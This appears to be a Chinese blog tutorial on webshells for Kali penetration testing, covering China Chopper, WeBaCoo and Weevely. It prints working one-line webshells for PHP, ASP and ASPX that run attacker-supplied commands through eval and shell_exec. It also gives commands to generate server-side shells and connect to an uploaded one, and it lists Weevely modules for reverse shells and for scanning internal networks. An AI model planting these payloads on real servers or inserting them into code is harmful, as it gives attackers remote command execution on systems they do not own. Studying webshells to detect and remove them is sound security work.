kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)

本质 : 上传一句话木马

<?php echo shell_exec($_GET[‘cmd‘]);?>

windows平台

中国菜刀

支持asp、php、asp.net和jsp等
可能被IDS、AV、WAF、扫描器软件发现查杀

使用方法:
  1. 往目标web服务器上传相应的一句话木马

asp一句话木马:

<%execute(request("pass"))%>

php一句话木马:

<?php @eval($_POST[pass]);?>

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"])%>
  1. 打开中国菜刀,输入网址和密码(一句话木马中的参数) 连接服务端
    这里写图片描述

Linux平台

获取的是类终端的shell
通信内容base64编码后通过cookie头传输,隐蔽性较强
缺点是不能指定密码

cookie中的参数
  • cm: base64编码的命令

  • cn: 服务器用于返回数据的cookie头的名

  • cp: 返回信息定界符

使用方法

1、生成服务器端

wenacoo -g -o a.php

2、上传后用客户端进行连接

webacoo -t -u http://1.1.1.1/a.php

Weevely(只支持PHP)

  • 用http头进行指令传输
  • 隐蔽的类终端PHP Webshell
  • 有30多个管理模块

    • 执行系统命令、浏览文件系统

    • 检查服务器常见配置错误

    • 创建正向、反向TCP Shell连接

    • 通过目标计算机代理HTTP流量

    • 从目标计算机运行端口扫描,渗透内网

  • 支持连接密码

使用方法

1、生成服务端

weevely generate <password> b.php

生成的文件在 /usr/share/weevely/ 目录下

2、 连接客户端

weevely <URL> <password>

3、 输入help查看模块
这里写图片描述

  • 9
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值